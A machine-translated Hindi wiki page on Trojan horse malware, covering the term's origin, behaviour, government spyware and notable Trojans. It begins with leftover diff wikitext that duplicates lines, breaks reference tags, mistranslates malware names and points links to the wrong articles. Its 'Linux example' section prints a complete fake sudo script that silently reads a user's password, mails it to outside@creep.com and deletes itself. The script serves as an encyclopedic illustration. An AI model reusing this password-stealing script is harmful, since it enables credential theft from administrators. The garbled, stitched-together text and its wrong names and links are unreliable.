* [[मेगापैंजर|मेगापैंजर बुंडेस ट्रोजनर]] - 2009 (प्रकाशित)<ref>{{Cite web|url=https://sourceforge.net/projects/mega-panzer/|title=मेगा पैंजर|website=SourceForge}}</ref><ref>{{Cite web|url=https://sourceforge.net/projects/mini-panzer/|title=मिनी टैंक|website=SourceForge}}</ref>
* Leurak द्वारा [[MEMZ]] - 2016 (प्रकाशित)
* Leurak द्वारा [[MEMZ]] - 2016 (प्रकाशित)


=== सुरक्षा शोधकर्ताओं द्वारा पता लगाया ===
=== सुरक्षा शोधकर्ताओं द्वारा पता लगाया ===
* [[बारह टोटके]] - 1990
* [[बारह टोटके]] - 1990
* क्लिकबॉट.ए - 2006 (खोजा गया)
* [[क्लिकबॉट.ए]] - 2006 (खोजा गया)
* ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
* [[ज़्यूस]] - 2007 (खोजा गया)
* ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
* [[पूर्वदृश्य]] [[ट्रोजन]] - 2011 (खोजा गया)
* ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
* [[ज़ीरोएक्सेस]] - 2011 (खोजा गया)
* [[कोबफेस]] - 2008 (खोजा गया)
* [[कोबफेस]] - 2008 (खोजा गया)
* [[चोट]] - 2009 (खोजा गया)
* [[चोट|वंडो]]- 2009 (खोजा गया)
* [[कोरफ्लड]] - 2010 (खोजा गया)
* [[कोरफ्लड]] - 2010 (खोजा गया)
* [[टिनी बैंकर ट्रोजन]] - 2012 (खोजा गया)
* [[टिनी बैंकर ट्रोजन]] - 2012 (खोजा गया)
* सोवा - 2022 (खोजा गया)<ref>{{cite web|url=https://www.indiatoday.in/amp/information/story/what-is-sova-virus-2001017-2022-09-16|title=सोवा वायरस क्या है?|website=India Today}}</ref>
* सोवा - 2022 (खोजा गया)<ref>{{cite web|url=https://www.indiatoday.in/amp/information/story/what-is-sova-virus-2001017-2022-09-16|title=सोवा वायरस क्या है?|website=India Today}}</ref>
* [[गवाह]] एंड्रॉइड मैलवेयर - 2015 (खोजा गया)<ref>{{cite web|url=https://blog.lookout.com/blog/2015/11/19/shedun-trojanized-adware/|title=ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग}}</ref><ref>{{cite web |last1=Neal |first1=Dave |title=शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है|url=http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |website=[[The Inquirer]] |publisher=Incisive Business Media |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20151122002729/http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |archive-date=2015-11-22 |date=2015-11-20 |url-status=unfit}}</ref><ref>{{cite web |url=https://blog.lookout.com/blog/2015/11/04/trojanized-adware/ |title=लुकआउट ने नए ट्रोजनाइज्ड एडवेयर की खोज की; 20,000 लोकप्रिय ऐप क्रॉसफ़ायर में फंस गए - लुकआउट ब्लॉग}}</रेफरी><ref>{{cite web |url=https://betanews.com/2015/11/05/shuanet-shiftybug-and-shedun-malware-could-auto-root-your-android/ |title=Shuanet, ShiftyBug और Shedun मैलवेयर आपके Android को ऑटो-रूट कर सकते हैं|date=November 5, 2015}}</ref><ref>{{cite web |url=http://www.techtimes.com/articles/104373/20151109/new-family-of-android-malware-virtually-impossible-to-remove-say-hello-to-shedun-shuanet-and-shiftybug.htm |title=एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें|first=Tech |last=Times |date=November 9, 2015}}</ref><ref>{{cite web |url=https://arstechnica.com/security/2015/11/android-adware-can-install-itself-even-when-users-explicitly-reject-it/ |title=एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें|date=2015-11-19}}</ref>
* [[गवाह|शेडुन]] एंड्रॉइड मैलवेयर - 2015 (खोजा गया)<ref>{{cite web|url=https://blog.lookout.com/blog/2015/11/19/shedun-trojanized-adware/|title=ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग}}</ref><ref>{{cite web |last1=Neal |first1=Dave |title=शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है|url=http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |website=[[The Inquirer]] |publisher=Incisive Business Media |access-date=2020-03-27 |archive-url=https://web.archive.org/web/20151122002729/http://www.theinquirer.net/inquirer/news/2435721/shedun-trojan-adware-is-hitting-the-android-accessibility-service |archive-date=2015-11-22 |date=2015-11-20 |url-status=unfit}}</ref><ref>{{cite web |url=https://blog.lookout.com/blog/2015/11/04/trojanized-adware/ |title=लुकआउट ने नए ट्रोजनाइज्ड एडवेयर की खोज की; 20,000 लोकप्रिय ऐप क्रॉसफ़ायर में फंस गए - लुकआउट ब्लॉग}}</ref><ref>{{cite web |url=https://betanews.com/2015/11/05/shuanet-shiftybug-and-shedun-malware-could-auto-root-your-android/ |title=Shuanet, ShiftyBug और Shedun मैलवेयर आपके Android को ऑटो-रूट कर सकते हैं|date=November 5, 2015}}</ref><ref>{{cite web |url=http://www.techtimes.com/articles/104373/20151109/new-family-of-android-malware-virtually-impossible-to-remove-say-hello-to-shedun-shuanet-and-shiftybug.htm |title=एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें|first=Tech |last=Times |date=November 9, 2015}}</ref><ref>{{cite web |url=https://arstechnica.com/security/2015/11/android-adware-can-install-itself-even-when-users-explicitly-reject-it/ |title=एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें|date=2015-11-19}}</ref>
 
 
 
 
 
 
 




== पूंजीकरण ==
कंप्यूटर शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए लोअर केस ट्रोजन का सुझाव देते हैं।<ref>{{cite web |title=ट्रोजन|url=https://www.collinsdictionary.com/dictionary/english/ट्रोजन|website=Collins Advanced Dictionary |access-date=29 March 2020}}</ref><ref>{{cite web |title=ट्रोजन हॉर्स|url=https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/t/trojan-horse-trojan |website=Microsoft Style Guide |publisher=Microsoft |access-date=29 March 2020}}</ref>




== कैपिटल वर्णीकरण ==
परिकलक शब्द "ट्रोजन हॉर्स" प्राचीन शहर [[बोटनेट|ट्रॉय]] के प्रसिद्ध [[बोटनेट|ट्रोजन]] [[बोटनेट|हॉर्स]] से लिया गया है। इस कारण "ट्रोजन" को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि [[बोटनेट|शैली]] [[बोटनेट|निर्देश]] और शब्दकोश अलग-अलग होते हैं, कई लोग सामान्य उपयोग के लिए छोटे अक्षर "ट्रोजन" का सुझाव देते हैं।<ref>{{cite web |title=ट्रोजन|url=https://www.collinsdictionary.com/dictionary/english/ट्रोजन|website=Collins Advanced Dictionary |access-date=29 March 2020}}</ref><ref>{{cite web |title=ट्रोजन हॉर्स|url=https://docs.microsoft.com/en-us/style-guide/a-z-word-list-term-collections/t/trojan-horse-trojan |website=Microsoft Style Guide |publisher=Microsoft |access-date=29 March 2020}}</ref>
== यह भी देखें ==
== यह भी देखें ==
* [[कंप्यूटर सुरक्षा]]
* [[कंप्यूटर सुरक्षा|परिकलक सुरक्षा]]
* कोयल का अंडा (रूपक) | कोयल का अंडा (रूपक)
* [[कोयल|कोयल का]] [[अंडा]] [[रूपक|(रूपक)]]
* [[साइबर जासूसी]]
* [[साइबर जासूसी]]
* [[नाचने वाले सूअर]]
* [[नाचने वाले सूअर]]
* [[शोषण (कंप्यूटर सुरक्षा)]]
* [[शोषण (कंप्यूटर सुरक्षा)|शोषण (]][[कंप्यूटर सुरक्षा|परिकलक सुरक्षा)]]
* [[औद्योगिक जासूसी]]
* [[औद्योगिक जासूसी]]
* [[फ़िशिंग]]
* [[फ़िशिंग]]
Line 143: Line 143:
* [[धोखाधड़ी करने वाले]]
* [[धोखाधड़ी करने वाले]]
* [[तकनीकी सहायता घोटाला]]
* [[तकनीकी सहायता घोटाला]]
* [[कंप्यूटर वायरस और वर्म्स की समयरेखा]]
* [[ज़ोंबी (कंप्यूटर विज्ञान)|परिकलक]] [[वायरस]] [[और]] [[वर्म्स|वर्म्स की]] [[समयरेखा]]
* [[ज़ोंबी (कंप्यूटर विज्ञान)]]
* [[ज़ोंबी (कंप्यूटर विज्ञान)|ज़ोंबी (परिकलक विज्ञान)]]


==संदर्भ==
==संदर्भ==
Line 151: Line 151:




==इस पेज में लापता आंतरिक लिंक की सूची==


*प्राचीन यूनानी
 
*मिनीपैंजर और मेगापैंजर
 
*विदेशी खुफिया सेवा (रूस)
 
*एनोम
 
*ेगाबत्र
 
*घो0स्त चूहा
 
*बिफ्रॉस्ट (ट्रोजन हॉर्स)
 
*जानवर (ट्रोजन हॉर्स)
 
*ज़ीउस (ट्रोजन हॉर्स)
 
*जीरो एक्सेस बॉटनेट
 
*शैली गाइड
 
 
==बाहरी संबंध==
==बाहरी संबंध==
*{{Commonscatinline|Trojan horse (malware)}}
*{{Commonscatinline|Trojan horse (malware)}}
*{{cite web |title=CERT Advisory CA-1999-02 Trojan Horses |url=https://resources.sei.cmu.edu/asset_files/WhitePaper/1999_019_001_496184.pdf#page=14 |website=Carnegie Mellon University Software Engineering Institute |archive-url=https://web.archive.org/web/20001017172300/http://www.cert.org/advisories/CA-1999-02.html |archive-date=2000-10-17 |access-date=15 September 2019 |url-status=live}}
*{{cite web |title=CERT Advisory CA-1999-02 Trojan Horses |url=https://resources.sei.cmu.edu/asset_files/WhitePaper/1999_019_001_496184.pdf#page=14 |website=Carnegie Mellon University Software Engineering Institute |archive-url=https://web.archive.org/web/20001017172300/http://www.cert.org/advisories/CA-1999-02.html |archive-date=2000-10-17 |access-date=15 September 2019 |url-status=live}}
{{Malware}}


{{Authority control}}
{{Authority control}}


{{DEFAULTSORT:Trojan Horse (Computing)}}[[Category:ट्रोजन हॉर्सेस| ]]
{{DEFAULTSORT:Trojan Horse (Computing)}}
[[Category: सामाजिक इंजीनियरिंग (कंप्यूटर सुरक्षा)]]
[[Category:स्पाइवेयर]]
[[Category:वेब सुरक्षा शोषण]]
[[Category:साइबरवारफेयर]]
[[Category: सुरक्षा उल्लंघन]]
 


[[Category: Machine Translated Page]]
[[Category:Articles with short description|Trojan Horse (Computing)]]
[[Category:Created On 16/12/2022]]
[[Category:CS1 maint|Trojan Horse (Computing)]]
[[Category:Collapse templates|Trojan Horse (Computing)]]
[[Category:Commons category link is locally defined|Trojan Horse (Computing)]]
[[Category:Created On 16/12/2022|Trojan Horse (Computing)]]
[[Category:Lua-based templates|Trojan Horse (Computing)]]
[[Category:Machine Translated Page|Trojan Horse (Computing)]]
[[Category:Navigational boxes| ]]
[[Category:Navigational boxes without horizontal lists|Trojan Horse (Computing)]]
[[Category:Pages with reference errors|Trojan Horse (Computing)]]
[[Category:Pages with script errors|Trojan Horse (Computing)]]
[[Category:Templates Translated in Hindi|Trojan Horse (Computing)]]
[[Category:Templates Vigyan Ready|Trojan Horse (Computing)]]
[[Category:Templates that add a tracking category|Trojan Horse (Computing)]]
[[Category:Templates that generate short descriptions|Trojan Horse (Computing)]]
[[Category:Templates using TemplateData|Trojan Horse (Computing)]]
[[Category:ट्रोजन हॉर्सेस| ]]
[[Category:वेब सुरक्षा शोषण|Trojan Horse (Computing)]]
[[Category:साइबरवारफेयर|Trojan Horse (Computing)]]
[[Category:सामाजिक इंजीनियरिंग (कंप्यूटर सुरक्षा)|Trojan Horse (Computing)]]
[[Category:सुरक्षा उल्लंघन|Trojan Horse (Computing)]]
[[Category:स्पाइवेयर|Trojan Horse (Computing)]]

Latest revision as of 21:37, 11 July 2023

संगणना में, एक ट्रोजन हॉर्स एक मैलवेयर है जो उपयोगकर्ताओं को एक मानक प्रोग्राम के रूप में खुद को छिपाकर अपने वास्तविक उद्देश्य से गलत सूचना देता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5]

ट्रोजन आमतौर पर सामाजिक अभियान्त्रिकी के किसी न किसी रूप से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने के लिए एक ईमेल संबद्धता निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सामाजिक संचार माध्यम पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। हालांकि उनका आयभार कुछ भी हो सकता है, कई आधुनिक रूप से पिछले दरवाजे के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर अनाधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

परिकलक वायरस और वर्म के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में अन्तःक्षेप करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।[7]

शब्द का प्रयोग

यह स्पष्ट नहीं है कि कब और कहां अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स नियमावली ने माना कि इसके पाठक दोनों को जानते थे:[8]

साथ ही, कोई भी अटल-उपभोगकर्ता-आईडी बिट ऑन के साथ दस्तावेज के स्वामी को नहीं बदल सकता है, अन्यथा कोई अन्य की फाइलों का दुरुपयोग करने में सक्षम ट्रोजन हॉर्स बना सकता है।

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में अतिसंवेदनशीलता विश्लेषण पर अमेरिकी वायु सेना की सम्बन्ध में है।[9]

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "भरोसेमंद विश्वास पर विचार" में लोकप्रिय बनाया गया था,[10] उपशीर्षक: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मॉलटिक्स की सुरक्षा पर एक प्रतिवेदन से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे[11][12]

व्यवहार

एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक आदेश और नियंत्रण (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए पोर्ट के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रतिनिधि के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर ट्रोजन को संभावित रूप से "अधिकार" कर सकते हैं।

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है। गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[13][14] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर [15] और जर्मन "राज्य ट्रोजन" उपनाम R2D2 शामिल है।[13] जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है। [16]

हैकर्स के बीच बॉटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, ट्रोजन अधिक आम होते जा रहे हैं जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं।बिटडिफेंडर द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का वर्म से संबंध है, क्योंकि वे वर्म की मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।[17] बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर जो ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।[18]

लिनक्स उदाहरण

ट्रोजन हॉर्स एक ऐसी योजना है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।[19] एक आसान योजना लिनक्स सुडो कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका जैसे /tmpमें प्रतिलिपि बनाया जाता है। यदि कोई प्रशासक उस निर्देशिका में होता है और सुडो को निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:

:
# sudo
# ----

# Turn off the character echo to the screen.
stty -echo

/bin/echo -n "Password for `whoami`: "
read x
/bin/echo ""

# Turn back on the c8haracter echo.
stty echo

echo $x | mail -s "`whoami` password" outside@creep.com
sleep 1
echo Sorry.
rm $0

exit 0

आदेश प्रणाली आधारित ट्रोजन हॉर्सेस को रोकने के लिए, पथ में प्रवेश= परिवेश चर अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:..

उल्लेखनीय उदाहरण

निजी और सरकारी

सार्वजनिक रूप से उपलब्ध

सुरक्षा शोधकर्ताओं द्वारा पता लगाया






कैपिटल वर्णीकरण

परिकलक शब्द "ट्रोजन हॉर्स" प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण "ट्रोजन" को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली निर्देश और शब्दकोश अलग-अलग होते हैं, कई लोग सामान्य उपयोग के लिए छोटे अक्षर "ट्रोजन" का सुझाव देते हैं।[30][31]

यह भी देखें

संदर्भ

  1. Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved 2012-04-05.
  2. "ट्रोजन हॉर्स परिभाषा". Retrieved 2012-04-05.
  3. "ट्रोजन हॉर्स". Webopedia. Retrieved 2012-04-05.
  4. "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved 2012-04-05.
  5. "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved 2012-04-05.
  6. "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on 2013-08-19. Retrieved 2020-03-29.
  7. "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  8. Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved 28 March 2020.
  9. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
  10. Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  11. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  12. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  13. 13.0 13.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  14. "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  15. Dunn, John (27 August 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on 26 January 2014. Retrieved 10 January 2021.
  16. "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved 2018-04-14.
  17. "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on 2009-08-08. Retrieved 2020-03-27.
  18. Datta, Ganesh (2014-08-07). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on 2014-08-12. Retrieved 2020-03-27.
  19. Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  20. Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved 2021-05-10.
  21. "मेगा पैंजर". SourceForge.
  22. "मिनी टैंक". SourceForge.
  23. "सोवा वायरस क्या है?". India Today.
  24. "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
  25. Neal, Dave (2015-11-20). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on 2015-11-22. Retrieved 2020-03-27.{{cite web}}: CS1 maint: unfit URL (link)
  26. "लुकआउट ने नए ट्रोजनाइज्ड एडवेयर की खोज की; 20,000 लोकप्रिय ऐप क्रॉसफ़ायर में फंस गए - लुकआउट ब्लॉग".
  27. "Shuanet, ShiftyBug और Shedun मैलवेयर आपके Android को ऑटो-रूट कर सकते हैं". November 5, 2015.
  28. Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
  29. "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". 2015-11-19.
  30. "ट्रोजन". Collins Advanced Dictionary. Retrieved 29 March 2020.
  31. "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved 29 March 2020.









बाहरी संबंध